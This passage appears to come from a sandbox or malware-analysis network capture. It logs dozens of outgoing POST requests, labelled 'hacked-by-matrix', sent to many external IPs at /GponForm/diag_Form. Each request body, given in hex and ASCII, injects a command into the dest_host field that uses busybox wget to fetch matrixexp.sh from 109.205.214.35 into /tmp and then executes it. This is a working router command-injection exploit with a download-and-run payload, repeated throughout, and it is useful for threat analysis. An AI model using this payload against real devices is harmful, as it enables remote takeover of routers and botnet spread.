                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        229192.168.2.13388125.101.184.122443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460042953 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        230192.168.2.134065242.136.172.10443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460103989 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        231192.168.2.1352030118.155.45.213443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460156918 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        232192.168.2.133711842.138.28.223443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460210085 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        233192.168.2.1339220118.47.172.20443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460220098 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        234192.168.2.1346544109.182.147.17443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460247993 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        235192.168.2.134939042.133.108.151443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460266113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        236192.168.2.1342174109.29.225.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:56.460316896 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        237192.168.2.1348278109.9.151.213443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468364954 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        238192.168.2.13503745.97.200.186443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468432903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        239192.168.2.1336280109.117.213.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468458891 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        240192.168.2.13477225.193.84.205443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468497992 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        241192.168.2.1339866212.221.94.168443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468502998 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        242192.168.2.1347700118.27.57.249443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468533039 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        243192.168.2.1348402109.191.164.74443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468549013 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        244192.168.2.133472842.197.214.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468581915 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        245192.168.2.13341785.19.185.214443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468583107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        246192.168.2.1360218118.215.219.12443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468611002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        247192.168.2.134944242.25.245.156443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468671083 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        248192.168.2.13414265.55.4.113443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468688965 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        249192.168.2.13371125.166.237.243443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468722105 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        250192.168.2.1346684212.244.227.112443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468746901 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        251192.168.2.1344288109.132.37.145443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468760014 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
